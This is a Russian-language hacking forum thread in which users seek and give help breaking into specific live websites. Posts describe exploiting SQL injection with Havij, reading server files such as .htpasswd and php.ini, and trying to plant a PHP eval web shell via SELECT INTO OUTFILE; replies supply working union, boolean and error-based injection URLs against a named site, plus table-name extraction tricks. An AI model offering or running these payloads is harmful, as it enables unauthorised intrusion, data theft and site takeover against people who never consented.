Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    не знаю почему но пхпинфо вообще подчти нефига не показывает.
    спасибо, через
    Code:
    echo dirname(__FILE__);
    путь нашел

    Code:
    echo file_get_contents('config.php');
    не читает конфиг. перепробовал уйму вариантов.
    файл менеджер пишет 404, упрощеные шеллы не выполняются показывает исходный код,хотя файлы пхп с хело ворлд льются и запускаются как нужно...




    да бы не плодить кучу сообщений

    Code:
    LOAD DATA LOCAL INFILE '/home/h41954/data/www/' INTO TABLE test FIELDS TERMINATED BY '\n'
    я так понял LOAD DATA LOCAL INFILE работает на myslq до 5 ветки только?
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    нет, работает с 3 ветки. (с 3.22.6)
    пхпхинфо в студию.
     
    _________________________
  3. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    488
    Likes Received:
    63
    Reputations:
    26
    Вообщем случайно наткнулся на скуль, и решил попробовать крутануть ее. (havij'em))
    Не буду ходить вокруг до около. Опишу сразу все что пробовал и что не получается.
    Вообщем мускул работает от рута, на пользователя Root в мускуле даже пасса нет)
    Читаются все файлы на сервере, причем не только файлы но и например в хавиже запрос на чтение по такому пути /usr/home/www/htdocs/
    Вижу какие папки и файлы находятся в каталоге htdocs
    Вообщем все папки и файлы читаются на сервере.
    На самом сайте есть админка и она защищена .htpasswd
    Читаю .htpasswd выдираю логин пасс, воожу , не пускает.
    На сервере так же есть еще пару сайтов и везде в админку .htpasswd, но не пускает никуда(читал где то что в htaccess путь не правельно указан к htpasswd) вообще забил на такой способ попасть в админку.
    Так же на сервере есть phpmyadmin, доступ к нему идет через htaccess
    в файле .htaccess
    Code:
    <IfModule mod_auth.c>
      AuthName authorization
      AuthType Basic
      <IfModule mod_auth_pwcheck.c>
        AuthPwcheckActive On
        AuthPwcheckAuthoritative On
        require group rusers
        satisfy any
      </IfModule>
    </IfModule>
    
    Order deny,allow
    Deny from all
    
    <IfModule mod_charset.c>
      CharsetDisable On
    </IfModule>
    Собственно вариант попасть в phpmyadmin я тоже исключил.

    Решил попробовать через функцию Query в хавиже залить мини шелл таким образом
    Code:
    SELECT '<?php eval($_REQUEST[cmd]);?>' into outfile '/tmp/123.php'
    хавиж ошибку не выдал но и ничего вообще не произошло после запроса.
    Сообственно файл тоже не создался в tmp
    а да, забыл сообщить что FILE_PRIV = Y
    Ребят, очень нужно залится на сайт этот) очень жирный и полезный сайт. Прошу помощи.
    А еще попрошу не пинать за хавиж!)
     
    #23723 GroM88, 27 Dec 2014
    Last edited: 27 Dec 2014
  4. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    странно. на 2х mysql 5.** ветки пишет что не поддерживается версией
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,556
    Likes Received:
    398
    Reputations:
    230
    попробуй в диру сайта лить, найти папку для записи, руками а не через хавиж, возможно глюк в нём!
    Кстати, возможно ковычки ' вызывают ошибку, но хавиж может тебе и не показать, будешь руками запросы посылась сам увидешь в чём проблема!
     
    #23725 DezMond™, 27 Dec 2014
    Last edited: 27 Dec 2014
    1 person likes this.
  6. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    488
    Likes Received:
    63
    Reputations:
    26
    я пробовал уже) лил в папки которые доступны для записи... ноль эффекта.
    прочитал php.ini
    magic_quotes=off
    так что кавычки врятли тут роль играют)
     
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,556
    Likes Received:
    398
    Reputations:
    230
    сам пост/гет параметр можешь вызвать php ошибку, я не про фильтр говорю
    Откуда ты узнал, что папки доступны на запись?
     
    #23727 DezMond™, 27 Dec 2014
    Last edited: 27 Dec 2014
  8. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    488
    Likes Received:
    63
    Reputations:
    26
    Ну вообще прочитал скрипт для залития изображений из админки. там четко написанно что картинки и файлы будут заливатся в ту папку( ну и сообственно в папке этой куча грязи всякой)
    Ну а вообще я редко раньше встречал что бы /tmp/ была закрыта на запись)
    Поможешь в аське если есть время конешно, не хочу тут позорится просто : ))
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,556
    Likes Received:
    398
    Reputations:
    230
    пиши в асю гляну, права mysql могут отличасть от php, и там где может залить пхп скрипт, мускул может не залить файл!
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    может быть она просто выключена? по дефолту, обычно, вкл.
    присутствует в 5.7 и ниже http://dev.mysql.com/doc/refman/5.7/en/load-data.html
     
    _________________________
  11. x_Lex

    x_Lex Elder - Старейшина

    Joined:
    8 Jan 2005
    Messages:
    186
    Likes Received:
    118
    Reputations:
    171
    ребята кто знает как определить имя таблицы в sql инъекции error-based
    ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema
    Code:
    &orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version())))
    но продвинутся дальше не получается не знаю префикса названия таблиц
    вопрос как вызвать ошибку с названием таблицы в ней?
     
    #23731 x_Lex, 29 Dec 2014
    Last edited: 31 Dec 2014
  12. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    1. select table_name form information_schema.tables limit 1
    2. За сколько акк купили :)
     
    1 person likes this.
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    select table_name from information_schema.tables limit 1,1 вместо select version()
    с такими вопросами вам лучше сначала почитать статьи
     
    _________________________
  14. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    425
    Likes Received:
    179
    Reputations:
    108

    Ну во первых, как советуют выкинь Хавидж и сделай вручную.
    К тому же переведи в HEX колонку к виду 0x0000000 и

    SELECT 0x0000 INTO OUTFILE /path

    К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ
     
  15. x_Lex

    x_Lex Elder - Старейшина

    Joined:
    8 Jan 2005
    Messages:
    186
    Likes Received:
    118
    Reputations:
    171
    а блин забыл упомянуть что нет доступа с базе information_schema
     
  16. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Какого пост-запроса?
    Стандартгая ситуация у Вас, вектор - error based:
     
    2 people like this.
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,792
    Likes Received:
    835
    Reputations:
    856
    + к посту YaBtr

    Заменяем пробелы на %20

    Union Based

    http://www.favorite-picture.com/pictures/search/ffffff')and(1)=2%20order%20by%203%23.html

    http://www.favorite-picture.com/pictures/search/miss')and(1)=1%20union%20select%20@@version,222%23.html

    Boolean Based

    http://www.favorite-picture.com/pictures/search/ffffff')and(1='1.html

    http://www.favorite-picture.com/pictures/search/ffffff')and(1)=1%23.html

    Error Based Classic

    http://www.favorite-picture.com/pictures/search/miss')or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))%23.html

    Duplicate entry '5.5.38-0+wheezy11'
     
    _________________________
    2 people like this.
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
     
    _________________________
  19. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    425
    Likes Received:
    179
    Reputations:
    108
    Во первых попробовать так: `information_schema`.xxx.
    Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
     
  20. x_Lex

    x_Lex Elder - Старейшина

    Joined:
    8 Jan 2005
    Messages:
    186
    Likes Received:
    118
    Reputations:
    171
    нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema

    да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
     
Loading...
Thread Status:
Not open for further replies.